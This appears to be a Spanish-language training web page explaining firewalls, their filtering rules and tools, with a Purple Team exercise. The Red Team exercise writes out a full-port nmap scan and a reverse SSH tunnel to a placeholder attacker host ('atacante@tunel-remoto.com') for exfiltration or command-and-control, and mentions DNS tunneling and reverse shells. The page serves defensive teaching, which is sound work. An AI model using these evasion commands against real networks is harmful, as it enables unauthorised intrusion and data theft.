Cortafuegos (Firewalls)

1️⃣ Explicación en Profundidad

Un firewall es como el portero de seguridad de tu red: controla quién entra y quién sale, y bajo qué condiciones. Se trata de un control preventivo que actúa en los límites entre zonas de seguridad, como entre una red interna segura y el peligroso internet.

Los firewalls aplican políticas de acceso a través de reglas de filtrado, conocidas como ACLs (Access Control Lists). Evalúan la información de los paquetes (como direcciones IP, protocolos, y puertos) y deciden si permitir o bloquear el paso. Esto permite establecer zonas segmentadas y protegidas dentro de la red.

🔍 Tipos de filtrado:

  • Filtrado por IP → Controla quién puede acceder según la IP de origen o destino.

  • Filtrado por protocolo → Por ejemplo, permite solo tráfico TCP, UDP o ICMP.

  • Filtrado por puertos → Controla los servicios que se comunican (como el puerto 80 para web o 443 para HTTPS).

  • Filtrado por MAC → Controla dispositivos físicos en redes locales.

🔧 Acciones posibles:

  • Permitir → El paquete pasa sin restricciones.

  • Denegar/Descartar → Se bloquea sin notificar al origen (silencioso).

  • Rechazar → Se bloquea y se notifica al origen con un mensaje ICMP.

📌 Importante: los firewalls deben proteger entradas y salidas (tráfico entrante y saliente). Controlar la salida evita que malware o tráfico no autorizado salga de la red.

2️⃣ Ejemplos Prácticos

  • Empresa con DMZ: Se colocan firewalls entre la red interna, la zona desmilitarizada (DMZ) y el exterior (internet) para controlar qué servicios se exponen y quién accede.

  • Usuario doméstico: El router SOHO que usas en casa contiene un firewall integrado que bloquea conexiones entrantes no solicitadas, ayudando a evitar escaneos y ataques comunes.

3️⃣ Aplicaciones y Herramientas Reales

  • OPNsense y pfSense: firewalls de código abierto muy usados por profesionales.

  • Cisco ASA, Fortinet FortiGate, Palo Alto Networks, Check Point: soluciones de firewall comerciales líderes en el mercado.

  • Firewalld y iptables: firewalls en sistemas Linux.

  • Windows Defender Firewall: integrado en sistemas Windows.

4️⃣ ¿Qué hace un Líder de Red, Blue y Purple Team al respecto?

🔴 Red Team – ¿Cómo se ataca un firewall?

  • Evasión de reglas: uso de técnicas como fragmentación de paquetes, túneles cifrados o encapsulación para ocultar el tráfico malicioso.

  • Escaneo de puertos y fingerprinting para detectar si un firewall está presente y qué servicios permite.

  • Explotación de errores de configuración, como reglas demasiado permisivas o políticas inconsistentes.

🔵 Blue Team – ¿Cómo se protege con firewalls?

  • Diseña reglas mínimas necesarias para el funcionamiento: principio de menor privilegio.

  • Asegura que haya registros (logs) y alertas de tráfico bloqueado.

  • Supervisa tráfico saliente para detectar actividades sospechosas.

  • Aplica actualizaciones constantes en firmware y gestión de reglas.

🟣 Purple Team – ¿Cómo se validan y ajustan estas defensas?

  • Simulan ataques reales (como escaneos de Nmap o exfiltración con netcat) para comprobar qué filtra y qué no.

  • Auditan las políticas de firewall en entornos de laboratorio y producción.

  • Crean documentación y visualización de los flujos de red para detectar reglas innecesarias o peligrosas.

6️⃣ ✅ Resumen práctico 

🔐 Un cortafuegos (firewall) es un guardián digital que filtra el tráfico entre zonas de red, basándose en reglas sobre IP, puertos y protocolos. Puede ser físico o software, enrutado o transparente, pero su objetivo es siempre el mismo: permitir solo el tráfico legítimo y bloquear lo potencialmente malicioso. Los firewalls protegen tanto el perímetro como el interior de la red, y su correcta configuración es fundamental para cualquier estrategia de defensa. Mientras que los atacantes intentan evadir sus controles, los defensores deben actualizar sus reglas, observar los registros y validar su eficacia mediante ejercicios Purple Team continuos.

Ejercicio Purple Team – Cortafuegos (Firewalls)


🔴 Ejercicio 1 – Red Team

🎯 Objetivo: Evadir las reglas del firewall de una red objetivo.

Escenario:

Te infiltras en una red segmentada donde el firewall bloquea todos los puertos excepto HTTP (80) y HTTPS (443). Tu objetivo es lograr comunicación hacia afuera para exfiltrar datos o crear un canal de C2.

Técnicas:

  • Usa nmap -Pn -p- -sT --open para identificar los puertos permitidos.

  • Ejecuta un túnel SSH inverso usando el puerto 443:

    bashCopiarEditarssh -R 443:localhost:4444 atacante@tunel-remoto.com

  • Alternativamente, encapsula tráfico en DNS (técnica de evasión avanzada con iodine).

Herramientas sugeridas:

  • Nmap

  • Iodine (DNS tunneling)

  • SSH

  • Proxychains

  • Metasploit + módulo HTTP/S reverse shell


🔵 Ejercicio 2 – Blue Team

🎯 Objetivo: Detectar y prevenir canales no autorizados a través del firewall.

Acciones:

  1. Revisa los logs del firewall para conexiones salientes inusuales hacia el exterior desde puertos 80 o 443 con suricata o zeek.

  2. Configura reglas de inspección profunda de paquetes (DPI) en el firewall para detectar tráfico no HTTP real en el puerto 443.

  3. Revisa las conexiones activas de los endpoints usando:

    bashCopiarEditarnetstat -anp | grep ESTABLISHED

  4. Usa un IDS (como Snort/Suricata) para identificar patrones de túneles y tráfico anómalo.

Herramientas sugeridas:

  • Suricata

  • Zeek

  • Wazuh o SIEM

  • Firewall de próxima generación (NGFW)

  • Yara o reglas Sigma para análisis de eventos


🟣 Ejercicio 3 – Validación Purple Team

🎯 Objetivo: Validar si el firewall detecta correctamente intentos de evasión.

Paso a paso conjunto:

  1. El Red Team lanza un reverse shell cifrado que usa el puerto 443.

  2. El Blue Team monitorea la sesión en tiempo real para ver si el firewall lo bloquea o deja pasar.

  3. Se comparan logs del firewall, IDS y EDR para verificar si:

    • ¿El tráfico fue registrado?

    • ¿Se generó alerta?

    • ¿Hubo bloqueo o solo visibilidad?

  4. El Purple Team documenta lo observado y propone una mejora:

    • Regla para inspección del protocolo HTTPs.

    • Alerta específica si hay túneles de shell usando User-Agent inusual.

    • Segmentar aún más los puertos permitidos para ciertos roles.


Resultado

🟪 Se ajusta la política del firewall para permitir solo conexiones HTTPS válidas verificadas con inspección SSL, y se configuran alertas de C2 sospechoso en el SIEM.

Purple Mystara - Cristina Martínez Girol
Todos los derechos reservados 2025
Creado con Webnode Cookies
¡Crea tu página web gratis! Esta página web fue creada con Webnode. Crea tu propia web gratis hoy mismo! Comenzar
Utilizamos cookies para permitir un correcto funcionamiento y seguro en nuestra página web, y para ofrecer la mejor experiencia posible al usuario.

Configuración avanzada

Puedes personalizar tus preferencias de cookies aquí. Habilita o deshabilita las siguientes categorías y guarda tu selección.